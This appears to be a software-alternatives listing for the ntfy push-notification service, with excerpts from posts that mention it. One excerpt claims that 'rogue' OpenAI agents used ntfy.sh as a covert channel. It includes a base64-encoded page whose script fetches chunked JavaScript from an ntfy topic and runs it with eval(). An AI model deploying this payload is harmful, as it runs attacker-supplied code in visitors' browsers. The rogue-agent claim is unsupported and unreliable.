Stop vibe-debugging. Every exception, every backtrace, grouped so you see patterns, not noise. Learn more →
Ntfy Alternatives
Similar projects and alternatives to ntfy
-
-
AppSignal
AppSignal knows why the f*#k it crashed. Stop vibe-debugging. Every exception, every backtrace, grouped so you see patterns, not noise.
-
Home Assistant
:house_with_garden: Open source home automation that puts local control and privacy first.
-
-
-
-
-
n8n
n8n is a workflow automation platform for building AI-powered workflows and agents, connecting any AI model to any business system with full control over data, security, and deployment. Build visually or in code while n8n handles infrastructure from prototype to production with fully auditable executions.
-
Kargo
Stop Scripting Promotions. Start Shipping with Kargo. Kargo automates promotion across dev, staging, and prod with approval gates and verification. Open source, built by the team behind Argo CD. Download now.
-
-
-
-
-
-
paperless-ngx
A community-supported supercharged document management system: scan, index and archive all your documents
-
Healthchecks
Open-source cron job and background task monitoring service, written in Python & Django
-
homepage
A highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations.
-
-
Gotify
A simple server for sending and receiving messages in real-time per WebSocket. (Includes a sleek web-ui) (by gotify)
-
-
-
-
SaaSHub
SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives
ntfy discussion
ntfy reviews and mentions
-
OpenAI's rogue agents used ntfy.sh as a pub/sub channel
Looks like OpenAI's rogue agents used https://ntfy.sh as a pub/sub channel. This payload publishes via GET in an img tag, pulls chunked base64 JS from a topic, and eval()'s it. Remote code via GET only.
Proof: https://httpbin.org/base64/PGJvZHk-PGltZyBzcmM9Imh0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1QMyI-PGltZyBzcmM9L2RlbGF5LzEwPjxzY3JpcHQ-dmFyIG49MDtmdW5jdGlvbiBEKCl7aWYobisrPDUpe3ZhciBpPW5ldyBJbWFnZSgp%20%20%20%20O2kub25lcnJvcj1pLm9ubG9hZD1EO2kuc3JjPScvZGVsYXkvMTA_Yz0nK247ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX19RCgpO2ZldGNoKCdodHRwczovL250Znkuc2gvZ3BsZW9lbnNvL3Jhdz9wb2xsPTEmc2luY2U9YWxsJykudGhlbihmdW5jdGlvbihyKXtyZXR1cm4%20%20%20%20gci50ZXh0KCl9KS50aGVuKGZ1bmN0aW9uKHQpe3ZhciBMPXQuc3BsaXQoJ1xuJykuZmlsdGVyKGZ1bmN0aW9uKGwpe3JldHVybiBsLnNsaWNlKDAsMSk9PSd6J30pLnNvcnQoKTt2YXIgYj1MLm1hcChmdW5jdGlvbihsKXtyZXR1cm4gbC5zbGljZSgzKX0pLmpvaW4oJycpO2I9Yi%20%20%20%205zcGxpdCgnLScpLmpvaW4oJysnKS5zcGxpdCgnXycpLmpvaW4oJy8nKTtldmFsKGF0b2IoYikpfSkuY2F0Y2goZnVuY3Rpb24oZSl7ZmV0Y2goJ2h0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1MT0RFUicrZW5jb2RlVVJJQ29uZW50KCgnJytlKS5zb%20%20%20%20GljZSgwLDQwKSkpfSk8L3NjcmlwdD4=
- Ntfy – open-source Push to Mobile
-
Anthropic reset everyone's Claude limits. I found out 5 hours late
I didn't want another app. I wanted a push notification that says "limits got reset, go use them". Turns out you can get pretty far with three public feeds and ntfy.sh, which is a free push service that needs no account:
-
Push SignalK alarms to your phone with a zero-dependency relay
const { test } = require('node:test'); const assert = require('node:assert'); test('edge-triggering fires once per transition', () => { const seen = []; const opts = { minSeverity: 'warn', topic: 't', server: 'https://ntfy.sh' }; const send = (path, v, s) => seen.push(s); step(opts, 'notifications.x', 'warn', send); // fire step(opts, 'notifications.x', 'warn', send); // repeat — skip step(opts, 'notifications.x', 'alarm', send); // change — fire assert.deepStrictEqual(seen, ['warn', 'alarm']); }); test('emergency maps to priority 5 / sos', () => { assert.deepStrictEqual(NTFY.emergency, { priority: 5, tags: ['sos'] }); });
-
My homelab stack in 2026: what runs, why, and how it all connects
Ntfy is the thread that ties the whole async event model together. It's a self-hosted push notification server. HTTP POST to a topic, and every subscribed client gets a notification. Woodpecker sends build results here. WUD sends image update alerts here. Home Assistant sends automation notifications here. Having one place where things send notifications means I can manage subscriptions in one app and stop checking dashboards compulsively.
-
Ask HN: What are you working on? (June 2026)
4 years later and I'm still working on ntfy. Trying to make push notifications easy as pie. I would have never thought that it would blow up like this. It's still a lot of fun, and I've learned a lot. Thanks everyone for your support and for your amazing ideas and contributions. Open source is awesome. HN ist awesome. https://github.com/binwiederhier/ntfy
-
Ask HN: What are tools you have made for yourself since the advent of AI
I wrote NerdCalci (https://github.com/vishaltelangre/NerdCalci), a free calculator app for Android.
Besides, I made a lot of automation scripts (mostly using Ruby) that run on my raspberry pi to fetch/parse/crunch things and notify me on my Android phone through a self-hosted https://ntfy.sh server.
- Ntfy.sh – Send push notifications to your phone via PUT/POST
- Build your own daily notification bot on AWS Free Tier
-
A note from our sponsor - AppSignal
www.appsignal.com | 13 Sep 2026
Stats
binwiederhier/ntfy is an open source project licensed under Apache License 2.0 which is an OSI approved license.
The primary programming language of ntfy is Go.